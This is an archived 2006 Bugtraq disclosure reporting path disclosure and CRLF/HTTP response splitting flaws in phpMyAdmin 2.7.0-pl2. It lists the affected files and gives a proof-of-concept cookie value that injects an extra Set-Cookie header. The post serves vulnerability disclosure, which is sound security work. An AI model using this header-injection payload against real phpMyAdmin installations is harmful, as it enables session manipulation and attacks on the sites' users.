PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting
From: ajannhwt@xxxxxxxxxxx
Date: 3 Dec 2006 19:26:23 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

*************************************************************************************
# Title   :  PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response 
Splitting Vulnerability
# Author  :   ajann
# Contact :   :(
# Tested  :  Just 2.7.0-pl2

*************************************************************************************


[[CRLF]]]------------------------------------------------------

Files----

/css/phpmyadmin.css.php
/db_create.php
/index.php
/left.php
/libraries/session.inc.php
/libraries/transformations/overview.php
/querywindow.php
/server_engines.php
/...
/..

/Files----

Cookie:

->Open Cookie Editor
->Find the phpMyAdmin value
->Write it ;

phpMyAdmin=%0d%0aSet-Cookie%3Asome%3Dvalue

New Cookie => some=value

.....
..

[[/CRLF]]]

[[PATH]]]------------------------------------------------------

File----

//libraries/common.lib.php

/File----

[[/PATH]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

Prev by Date: 2[xss]Vulnerabilities in Script Mobile Ac4p.com
Next by Date: MS Internet Explorer 6.0 (mshtml.dll) Denial of Service Exploit
Previous by thread: 2[xss]Vulnerabilities in Script Mobile Ac4p.com
Next by thread: MS Internet Explorer 6.0 (mshtml.dll) Denial of Service Exploit
Index(es):
- Date
- Thread